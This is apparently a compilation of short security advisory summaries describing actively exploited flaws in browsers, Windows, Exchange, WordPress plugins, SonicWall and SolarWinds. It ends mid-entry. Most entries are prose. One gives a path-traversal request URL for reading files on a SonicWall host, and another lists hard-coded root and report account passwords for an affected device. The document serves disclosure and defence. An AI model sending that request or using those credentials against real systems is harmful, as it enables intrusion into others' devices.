The vulnerability exists due to a type confusion error within the V8 component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Security restrictions bypass

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to improperly imposed security restrictions in Microsoft Enhanced Cryptographic Provider. A local user can bypass implemented security restrictions and read or modify otherwise restricted information.

Security restrictions bypass

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to improperly imposed security restrictions in Microsoft Enhanced Cryptographic Provider. A local user can bypass implemented security restrictions and read or modify otherwise restricted information.

Note, the vulnerability is being actively exploited in the wild and related to a zero-day vulnerability in Adobe Reader #VU53125 (CVE-2021-28550) patched on May 11.

Improper Privilege Management

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to improper privilege management within the Microsoft DWM Core Library. A remote attacker can trick the victim to run a specially crafted executable or script and execute arbitrary code on the system.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error when processing HTML content within Windows MSHTML Platform. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Permissions, Privileges, and Access Controls

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists within the NTFS subsystem in Microsoft Windows. A local user can run a specially crafted program to execute arbitrary code with elevated privileges.

Improper Privilege Management

The vulnerability allows a local user to gain access to sensitive information.

The vulnerability exists due to improper privilege management. A local unprivileged user can read contents of Kernel memory from a user mode process.

Note, the vulnerability is being actively exploited in the wild.

Arbitrary file upload

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to insufficient validation of file during file upload in "wp-admin" or "wp-content/plugins/fancy-product-designer/inc". A remote attacker can upload a malicious file and execute it on the server.

Note, the vulnerability is being actively exploited in the wild.

Input validation error

The vulnerability allows a local user to bypass Privacy preferences.

The vulnerability exists due to insufficient validation of user-supplied input within the TCC subsystem. A malicious application can  bypass Privacy preferences and gain full disk access, perform screen recording or gain other permissions without requiring user's explicit consent.

Note, the vulnerability is being actively exploited in the wild by XCSSET malware.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error when processing PDF content. A remote attacker can create a specially crafted PDF file, trick the victim into opening it, trigger a use-after-free error and execute arbitrary code on the system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Detection of Error Condition Without Action

The vulnerability allows a local user to perform a denial of service (DoS) attack.

The vulnerability exists due to improper error handling within the Graphics component. A local user can trigger a new GPU address allocation failure and perform a denial of service attack.

Note, the vulnerability is being used in limited targeted attacks.

Use-after-free

The vulnerability allows a local user to escalate privileges on the system

The vulnerability exists due to a use-after-free error in Graphics component when handling memory mapping of multiple processes simultaneously. A local user can escalate privileges on the system.

Note, the vulnerability is being used in limited targeted attacks.

Buffer overflow

The vulnerability allows a local application to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Arm Mali GPU kernel driver. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r8p0 through r30p0. A local application can trigger memory corruption and execute arbitrary code on the system with elevated privileges.

Note, the vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a local application to escalate privileges on the system.

The vulnerability exists due to a use-after-free error within the Arm Mali GPU kernel driver. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r4p0 through r30p0. A local application can trigger a use-after-free error and execute arbitrary code on the system with elevated privileges.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error in WebKit. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Integer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to integer overflow in WebKit. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger integer overflow and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error in WebKit. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error when processing web content within the WebKit Storage component. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Security features bypass

The vulnerability allows a remote attacker to bypass implemented security restrictions.

The vulnerability exists due to a logic issue within the Gatekeeper checks. A remote attacker can craft a specially crafted payload that is not checked by Gatekeeper and bypasses File Quarantine and Application Notarization protections as well. As a result, a malicious binary can be executed on the system.

Note, the vulnerability is being actively exploited in the wild.

Path traversal

The vulnerability allows a remote user to perform directory traversal attacks.

The vulnerability exists due to input validation error when processing directory traversal sequences within the "branding"  feature. A remote authenticated user can send a specially crafted HTTP request and read arbitrary files on the system with NT AUTHORITY\SYSTEM account.

Request example:

https://<SonicWall ES host>/dload_apps?action=<any value>&path=..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fcalc.exe&id=update

Note, the vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error within the V8 browser engine in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Improper Authentication

The vulnerability allows a remote attacker to bypass authentication process and compromise the affected device.

The vulnerability exists due to multiple issues in web interface. A remote non-authenticated attacker can bypass authentication process and gain unauthorized access to the application via license server web services.

Successful exploitation of the vulnerability may allow an attacker to execute arbitrary code on the system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within win32k.sys driver in Microsoft Windows. A local user can run a specially crafted program to trigger memory corruption and execute arbitrary code with elevated privileges.

Note, the vulnerability is being actively exploited in the wild.

Arbitrary file upload

The vulnerability allows a remote user to compromise vulnerable system.

The vulnerability exists due to insufficient validation of file during file upload within the branding feature. A remote administrator can upload a malicious ZIP archive to the system to an arbitrary location using directory traversal sequences in the filenames inside the uploaded archive and compromise the affected system.

Note, the vulnerability is being actively exploited in the wild.

Improper Authentication

The vulnerability allows a remote attacker to bypass authentication process.

The vulnerability exists due to an error in when processing authentication requests within the "/createou?data=", responsible for administration capabilities, specifically within the feature that allows application administrators to authorize an additional administrator account from a separate Microsoft Active Directory Organization Unit (AD OU). Requests to this form are not verified to require previous authentication to the appliance. A remote non-authenticated attacker can send a specially crafted XML document via HTTP GET or POST method, create a “role.ouadmin” account and authenticate to the application as an administrator.

Note, the vulnerability is being actively exploited in the wild.

Universal cross-site scripting

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data within the WebKit engine. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of arbitrary website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.

Note, the vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error within Blink component in Google Chrome. A remote attacker can create a specially crafted webpage, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, this vulnerability is being actively exploited in the wild.

Improper Authentication

The vulnerability allows a remote attacker to bypass authentication process.

The vulnerability exists due to an error in when processing authentication requests. A remote attacker can bypass authentication process and gain administrative access to the application.

Note, the vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a local application to escalate privileges on the system.

The vulnerability exists due to a boundary error within the dpu driver. A local application can trigger a use-after-free error and execute arbitrary code with kernel privileges.

Note, the vulnerability is being actively exploited in the wild.

Improper access control

The vulnerability allows a local application to gain access to sensitive information.

The vulnerability exists due to improper access restrictions to the sec_log file. A local application can read the log file and obtain sensitive system information.

Note, the vulnerability is being actively exploited in the wild.

Permissions, Privileges, and Access Controls

The vulnerability allows a local application to escalate privileges on the system.

The vulnerability exists due to improper access control in clipboard service. A local application can use the clipboard service to read and write arbitrary files on the device.

Note, the vulnerability is being actively exploited in the wild.

Security restrictions bypass

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to application does not properly impose security restrictions in BIOS firmware for X10 UP-series (H3 Single Socket “Denlow”) motherboard. A local user can plant malware into motherboard firmware and establish permanent persistence on the system, even if OS is reinstalled.

Note, the vulnerability is being actively exploited in the wild by the TrickBoot malware.

Server-Side Request Forgery (SSRF)

The vulnerability exists due to insufficient validation of user-supplied input. A remote attacker can send specially crafted HTTP request to the Microsoft Exchange OWA interface, upload arbitrary file on the server and execute it.

Note, this vulnerability is being actively exploited in the wild.

Input validation error

The vulnerability allows a remote attacker to execute arbitrary code on the system.

The vulnerability exists due to insufficient validation of user-supplied input. A remote attacker can send specially crafted data to the Exchange server and execute arbitrary code on the system.

Note, this vulnerability is being actively exploited in the wild.

Input validation error

The vulnerability allows a remote attacker to execute arbitrary code on the system.

The vulnerability exists due to insufficient validation of user-supplied input. A remote attacker can send specially crafted data to the Exchange server and execute arbitrary code on the system.

Note, this vulnerability is being actively exploited in the wild.

Input validation error

The vulnerability allows a remote attacker to execute arbitrary code on the system.

The vulnerability exists due to insufficient validation of user-supplied input. A remote attacker can send specially crafted data to the Exchange server and execute arbitrary code on the system.

Note, this vulnerability is being actively exploited in the wild.

Improper control of a resource through its lifetime

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to improper control of object lifetime in audio in Google Chrome. A remote attacker can trick the victim to visit a specially crafted webpage, trigger a stack-based buffer overflow and execute arbitrary code on the system.

Note, the vulnerability is being actively exploited in the wild.

Heap-based buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error when processing PDF files. A remote attacker can create a specially crafted PDf file, trick the victim into opening it, trigger a heap-based buffer overflow and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error when the Win32k.sys driver in Windows kernel. A local user can run a specially crafted program to trigger memory corruption and execute arbitrary code on the system with elevated privileges.

Note, the vulnerability is being actively exploited in the wild.

Double Free

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error when processing ".mht" files. A remote attacker can trick the victim to visit a specially crafted webpage, trigger a double free error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Heap-based buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within the V8 engine in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger heap-based buffer overflow and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Business Logic Errors

The vulnerability allows a remote attacker to execute arbitrary code on the system.

The vulnerability exists due to a logic issue in the WebKit component. A remote attacker can trick a victim to visit a malicious website and execute arbitrary code on the system.

Note: The vulnerability is being actively exploited in the wild.

Business Logic Errors

The vulnerability allows a remote attacker to execute arbitrary code on the system.

The vulnerability exists due to a logic issue in the WebKit component. A remote attacker can trick a victim to visit a malicious website and execute arbitrary code on the system.

Note: The vulnerability is being actively exploited in the wild.

Race condition

The vulnerability allows a remote attacker to escalate privileges on the system.

The vulnerability exists due to a race condition in the Kernel component. A remote attacker can use a malicious application and escalate privileges on the system.

Note: The vulnerability is being actively exploited in the wild.

SQL injection

The vulnerability allows a remote attacker to execute arbitrary SQL queries in database.

The vulnerability exists due to insufficient sanitization of user-supplied data. A remote non-authenticated attacker can send a specially crafted HTTP request to the SSL-VPN appliance and execute arbitrary SQL commands within the application database.

Successful exploitation of this vulnerability may allow a remote attacker to access usernames, passwords and other session related information.

Note, the vulnerability is being actively exploited in the wild.

Input validation error

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to insufficient validation of user-supplied input. A remote attacker can pass specially crafted input to the application and execute arbitrary code on the system.

Note, the vulnerability is being actively exploited in the wild.

SQL injection

The vulnerability allows a remote attacker to execute arbitrary SQL queries in database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed to the web interface. A remote non-authenticated attacker can send a specially crafted request to the affected application and execute arbitrary SQL commands within the application database.

Successful exploitation of this vulnerability may allow a remote attacker to read, delete, modify data in database and gain complete control over the affected application.

Note, the vulnerability is being actively exploited in the wild in mid-December 2020 and January 2021.

Improper Authentication

The vulnerability allows a remote attacker to bypass authentication process.

The vulnerability exists due to an error in when processing authentication requests within the SolarWinds Orion API. If an attacker appends a PathInfo parameter of WebResource.adx, ScriptResource.adx, i18n.ashx, or Skipi18n to a request to a SolarWinds Orion server, SolarWinds may set the SkipAuthorization flag, which may allow the API request to be processed without requiring authentication. This vulnerability could allow a remote non-authenticated attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance.

Note, this vulnerability is dubbed SUPERNOVA and is being exploited in the wild.

Embedded malicious code (backdoor)

The vulnerability allows a remote attacker to gain unauthorized access to the application.

The vulnerability exists due to presence of embedded malicious functionality in the application code (aka backdoor) that allows a remote attacker to gain unauthorized access to the application.

According to SolarWinds, Orion Platform software builds for versions 2019.4 HF 5 through 2020.2.1 are affected.

Note, this vulnerability is being actively exploited in the wild in a supply chain attack and is dubbed SUNBURST.

Improper access control

The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.

The vulnerability exists due to improper access restrictions. A remote attacker can access the debug log after the password reset, grab the reset link and take over the admin account.

Note: The vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error within the site isolation component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger use-after-free error and execute arbitrary code on the target system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Improperly implemented security check for standard

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to incorrect implementation in V8 in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it and compromise the system.

Note, the vulnerability is being actively exploited in the wild.

Out-of-bounds read

The vulnerability allows a local user to gain access to potentially sensitive information.

The vulnerability exists due to a boundary condition within macOS kernel. A local user can run a specially crafted program to gain access to sensitive kernel information on the system.

Note, this vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a type confusion error in macOS kernel. A local user can run a specially crafted application to trigger a type confusion error and execute arbitrary code with elevated privileges.

Note, this vulnerability is being actively exploited in the wild.

Memory corruption

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error when processing fonts within the FontParser component. A remote attacker can create a specially crafted document or web page, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, this vulnerability is being actively exploited in the wild.

Heap-based buffer overflow

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to a heap-based buffer overflow when processing untrusted HTML content in UI in Google Chrome on Android. An remote attacker, who had compromised the renderer process, can  perform a sandbox escape via a crafted HTML page.

Successful exploitation of the vulnerability may allow an attacker to compromise the affected system.

Note, the vulnerability is being actively exploited in the wild.

Improperly implemented security check for standard

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to incorrect implementation in V8 engine in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it and compromise the system.

Note, this vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privilege son the system.

The vulnerability exists due to a boundary error within the Windows Kernel Cryptography Driver cng.sys, which exposes a "\Device\CNG" device to user-mode programs and supports a variety of IOCTLs with non-trivial input structures. A local user can run a specially crafted program to trigger memory corruption and execute arbitrary code on the system with elevated privileges.

Note, this vulnerability is being actively exploited in the wild.

Improper input validation

The vulnerability allows a remote non-authenticated attacker to execute arbitrary code.

The vulnerability exists due to improper input validation within the Pluggable authentication module (PAM) component in Oracle Solaris. A remote non-authenticated attacker can exploit this vulnerability to execute arbitrary code.

Note, this vulnerability is being actively exploited in the wild.

Heap-based buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error in freetype library when processing TTF files. A remote attacker can pass specially crafted TTF file with PNG sbit glyphs to the application, trigger heap-based buffer overflow and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, this vulnerability is being actively exploited in the wild.

Arbitrary file upload

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to insufficient validation of file during file upload in wp-file-manager in the "lib/php/connector.minimal.php" and "lib/files/hardfork.php" files. A remote attacker can upload a malicious file and execute it on the server.

Note: The vulnerability is being actively exploited in the wild. 

Resource exhaustion

The vulnerability allows a remote attacker to perform a denial of service (DoS) attack.

The vulnerability exists due to insufficient queue management for Internet Group Management Protocol (IGMP) packets in the Distance Vector Multicast Routing Protocol (DVMRP) feature of Cisco IOS XR Software. A remote attacker can trigger resource exhaustion by sending crafted IGMP  traffic to the affected device and perform a denial of service (DoS) attack.

Resource exhaustion

The vulnerability allows a remote attacker to perform a denial of service (DoS) attack.

The vulnerability exists due to insufficient queue management for Internet Group Management Protocol (IGMP) packets in the Distance Vector Multicast Routing Protocol (DVMRP) feature of Cisco IOS XR Software. A remote attacker can trigger resource exhaustion by sending crafted IGMP  traffic to the affected device and perform a denial of service (DoS) attack.

Note: this vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within the scripting engine. A remote attacker can create a specially crafted webpage, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild.

Cryptographic issues

The vulnerability allows a remote attacker to bypass implemented security restrictions.

The vulnerability exists due to Windows incorrectly validates file signatures. A remote attacker can create a specially crafted file to bypass implemented security restrictions and successfully load a malicious file.

Note: this vulnerability is being actively exploited in the wild.

Stored cross-site scripting

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data. A remote authenticated attacker can inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.

Note: The vulnerability is being actively exploited in the wild.

Arbitrary file upload

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to insufficient validation of file during file upload. A remote authenticated attacker can upload a malicious file and execute it on the blog.

This vulnerability is exploitable if users have open registration, hovewer in conjunction with a vulnerability in Ultimate Addons for Elementor (SB2020051119), it is possible to be exploited, even if the site does not have user registration enabled.

Note: The vulnerability is being actively exploited in the wild.

SQL injection

The vulnerability allows a remote attacker to execute arbitrary SQL queries in database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed to the User Portal or Admin interfaces. A remote non-authenticated attacker can send a specially crafted request to the affected application and execute arbitrary SQL commands within the application database.

Successful exploitation of this vulnerability may allow a remote attacker to read, delete, modify data in database and gain complete control over the affected application.

Note, this vulnerability is being actively exploited in the wild.

Out-of-bounds write

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a boundary error when processing email in the iOS MobileMail. A remote attacker can send a specially crafted email message, trigger an out-of-bounds write and execute arbitrary code on the target system. No user interaction is required to execute arbitrary code.

Note, this vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privilege so the system.

The vulnerability exists due to a boundary error in the Windows Kernel when handling objects in memory. A local user can use a specially crafted application, trigger memory corruption and execute arbitrary code on the target system with elevated privileges.

Note, this vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error caused by a race condition handling ReadableStream. A remote attacker can create a specially crafted website, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, this vulnerability is being actively exploited in the wild in targeted attacks.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error caused by a race condition running the nsDocShell destructor. A remote attacker can create a specially crafted website, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, this vulnerability is being actively exploited in the wild in targeted attacks.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within the Windows Adobe Type Manager Library when parsing a specially-crafted multi-master font - Adobe Type 1 PostScript format. A remote attacker can create a specially crafted document, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, this vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within the Windows Adobe Type Manager Library when parsing a specially-crafted multi-master font - Adobe Type 1 PostScript format. A remote attacker can create a specially crafted document, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, this vulnerability is being actively exploited in the wild.

Use of hard-coded credentials

The vulnerability allows a remote attacker to gain full access to vulnerable system.

The vulnerability exists due to presence of hard-coded credentials in application code. A remote unauthenticated attacker can access the affected system using the hard-coded credentials.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Hard-coded accounts:

root/icatch99
report/8Jg0SR8K50

Note, this vulnerability is being actively exploited in the wild since August 2019.

Input validation error

The vulnerability allows a remote attacker to compromise the target system.

The vulnerability exists due to a content validation escape issue. A remote authenticated attacker can pass specially crafted input to the application and manipulate certain agent client components.

Note: the vulnerability is being actively exploited in the wild.

Code Injection

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to improper input validation in the migration tool component. A remote authenticated attacker can send a specially crafted request and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: the vulnerability is being actively exploited in the wild.

Improper access control

The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.

The vulnerability exists due to improper access restrictions. A remote attacker can bypass implemented security restrictions and gain unauthorized access to the application, leading to data modification and deletion, including the potential to delete the entire contents of any table in a vulnerable site’s database.

Note: the vulnerability is being actively exploited in the wild.

Stored cross-site scripting

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data in the "wp-admin/admin-ajax.php" file with the "aj_steps" AJAX action. A remote authenticated attacker can inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.

Note: the vulnerability is being actively exploited in the wild.

Stored cross-site scripting

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data in the plugin’s setup process. A remote attacker can inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.

Note: the vulnerability is being actively exploited in the wild.

Stored cross-site scripting

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data in several AJAX actions. A remote authenticated attacker can inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.

Note: the vulnerability is being actively exploited in the wild.

Improper access control

The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.

The vulnerability exists due to improper access restrictions. A remote attacker can bypass implemented security restrictions and inject new fields and scripts into the WooCommerce checkout page.

Note: the vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error in V8 component. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: This vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within the scripting engine. A remote attacker can create a specially crafted webpage, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error with StoreElementHole and FallibleStoreElement when processing HTML content in IonMonkey JIT compiler. A remote attacker can create a specially crafted webpage, trick the victim into visiting it, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, this vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error when processing objects in memory within the Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.

Note, this vulnerability is being actively exploited in the wild.

Improper Neutralization of Special Elements in Output Used by a Downstream Component

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to the affected devices allow remote code execution as root (without authentication) via shell metacharacters to the "cgi-bin/mainfunction.cgi" URI.

Note, this vulnerability is being actively exploited in the wild starting from December 4, 2019.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within the scripting engine. A remote attacker can create a specially crafted webpage, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error when processing HTML content within the audio component. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.

Note, this vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a use-after-free error within the scripting engine in JScript.dll. A remote attacker can create a specially crafted webpage, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the ws2ifsl.sys (Winsock). A local user can run a specially crafted application, trigger memory corruption and execute arbitrary code on the target system with elevated privileges.

Note, this vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Windows Common Log File System (CLFS) driver. A local user  can create a specially crafted application and execute arbitrary code on the system with elevated privileges.

Note, this vulnerability is being actively exploited in the wild.

NULL pointer dereference

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a NULL pointer dereference  error when processing objects in memory within the Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.

Note, this vulnerability is being actively exploited in the wild.

Permissions, Privileges, and Access Controls

The vulnerability allows a local to escalate privileges on the system.

The vulnerability exists due to the way splwow64.exe handles certain calls. A local user can abuse this functionality to elevate privileges on an affected system from low-integrity to medium-integrity.

Note, this vulnerability is being actively exploited in the wild.

Permissions, Privileges, and Access Controls

The vulnerability allows a remote attacker to bypass sandbox restrictions.

The vulnerability exists due to insufficient vetting of parameters passed with the Prompt:Open IPC message between child and parent processes. A remote attacker can create a specially crafted web page that can make the non-sandboxed parent process open web content chosen by a compromised child process.

An attacker can combine this behavior along with another vulnerability to execute arbitrary code on the system with privileges on the current user. 

Note, this vulnerability is being exploited in the wild along with SB2019061805 (CVE-2019-11707)

Deserialization of Untrusted Data

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to insecure input validation when processing serialized data within XMLDecoder class. A remote non-authenticated attacker can pass specially crafted data to the application and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error when manipulating JavaScript objects due to issues in Array.pop. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild along with SB2019062002 (CVE-2019-11708).

Input validation error

The vulnerability allows a local user to escalate privileges on the system.

